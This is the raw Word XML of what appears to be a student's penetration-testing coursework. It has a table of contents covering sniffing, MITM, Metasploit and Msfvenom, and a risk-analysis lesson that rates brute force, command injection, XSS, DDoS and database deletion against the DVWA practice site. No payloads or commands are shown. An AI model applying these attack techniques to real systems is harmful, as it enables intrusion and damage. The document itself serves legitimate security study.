          <w:hyperlink w:anchor="_Toc115553359" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Protocols and Servers</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553359 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A743B92" w14:textId="014335CB" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553360" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sniffing Attack</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553360 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="181E1068" w14:textId="4E297B58" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553361" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Man in the Middle Attack (MITM)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553361 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54681A61" w14:textId="111E7C71" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553362" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Transport Layer Security (TLS)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553362 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38C8E8B6" w14:textId="3829FAC4" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553363" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Secure Shell (SSH)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553363 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E94500F" w14:textId="3465831A" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553364" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553364 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>78</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6ACFFCEE" w14:textId="7645EEAF" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553365" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Metasploitable Server</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553365 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48271A1E" w14:textId="4FCCAEF4" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553366" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Msfvenom</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553366 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F21BADB" w14:textId="3E041A58" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553367" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553367 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="281A1B97" w14:textId="6C0A21BF"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5553313"/>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5553314"/>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5553315"/>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lastRenderedPageBreak/>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5553316"/>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5553317"/>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5553318"/>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5553319"/>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lastRenderedPageBreak/>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5553320"/>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lastRenderedPageBreak/>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5553321"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>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lastRenderedPageBreak/>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lastRenderedPageBreak/>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13D0EFD9" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc115553322"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lesson 1.3 (Risk Analysis)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="518E254F" w14:textId="553A1A7E" w:rsidR="00A07D28" w:rsidRDefault="00A07D28" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311748F6" w14:textId="6556E280" w:rsidR="00A07D28" w:rsidRDefault="00A07D28" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513C403C" w14:textId="6B72C7E0" w:rsidR="00A07D28" w:rsidRDefault="00A07D28" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I will try to find vulnerabilities in the DVWA website and based on them I will measure the risk of the different attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46786324" w14:textId="1E6A9CAB" w:rsidR="00A07D28" w:rsidRDefault="00A07D28" w:rsidP="00A07D28">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Brute Force:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B091672" w14:textId="2021C2A3" w:rsidR="00A07D28" w:rsidRDefault="00A07D28" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Brute force is trying to guess the user credentials using existing files full of usernames and passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A34A79E" w14:textId="1CA42907" w:rsidR="00A07D28" w:rsidRDefault="00A07D28" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The frustrating thing for the attacker about this attack is that they need to have the password in a file. </w:t>
      </w:r>
      <w:r w:rsidR="005023A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The chance of finding your own password in a Kali file or downloaded files is so rare, unless you use easy passwords like admin, password123, 12345, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C6B6DA" w14:textId="5C1056A8" w:rsidR="005023A7" w:rsidRDefault="005023A7" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The other thing that is stopping the attacker is that the website could block their ip address from sending requests when they brute force. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D9482A" w14:textId="71E47265" w:rsidR="005023A7" w:rsidRDefault="005023A7" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For these reasons I would give brute force </w:t>
      </w:r>
      <w:r w:rsidRPr="005023A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Low Probability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Although, if the attacker got lucky and found the user credentials, the impact against the user would be enormous, therefore I think brute force has </w:t>
      </w:r>
      <w:r w:rsidRPr="005023A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>very high (5) impact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64058600" w14:textId="77777777" w:rsidR="005023A7" w:rsidRDefault="005023A7" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01092D67" w14:textId="038073BB" w:rsidR="005023A7" w:rsidRDefault="005023A7" w:rsidP="005023A7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B723A4D" w14:textId="218070D1" w:rsidR="005023A7" w:rsidRDefault="005023A7" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is the attack when the attacker gets to execute commands on a remote target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5774B361" w14:textId="5454DCAC" w:rsidR="005023A7" w:rsidRPr="00A07D28" w:rsidRDefault="00313BE7" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I found it super difficult to understand at first. However I managed to gain the access for many remote targets.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC50F9A" w14:textId="77777777" w:rsidR="005023A7" w:rsidRDefault="005023A7" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2B62FD" w14:textId="77777777" w:rsidR="005023A7" w:rsidRDefault="005023A7" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B576735" w14:textId="77777777" w:rsidR="005023A7" w:rsidRDefault="005023A7" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101502E1" w14:textId="691E52B2" w:rsidR="00141090" w:rsidRDefault="00141090" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In this task, I will show some of the scenarios that might take place against my client, after that, I will rate every scenario how dangerous it is.</w:t>
      </w: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424B507C" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DDoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F40A0DD" w14:textId="7E5258DE" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Financial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403D20C" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="219236D1" w14:textId="562D5FF5" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Customer damage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="014DB2EA" w14:textId="3E7BCD34" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium (3)</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4B1417DE" w:rsidR="00F935E5" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F935E5" w14:paraId="09FF7C2F" w14:textId="22A72D5F" w:rsidTr="00F935E5">
        <w:trPr>
          <w:trHeight w:val="987"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30F3CA16" w14:textId="4354E8D7" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Dropping the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="139C885C" w14:textId="40BFEC9A" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7727E724" w14:textId="69BE69EA" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Very High (5)</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43423ECC" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium (3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
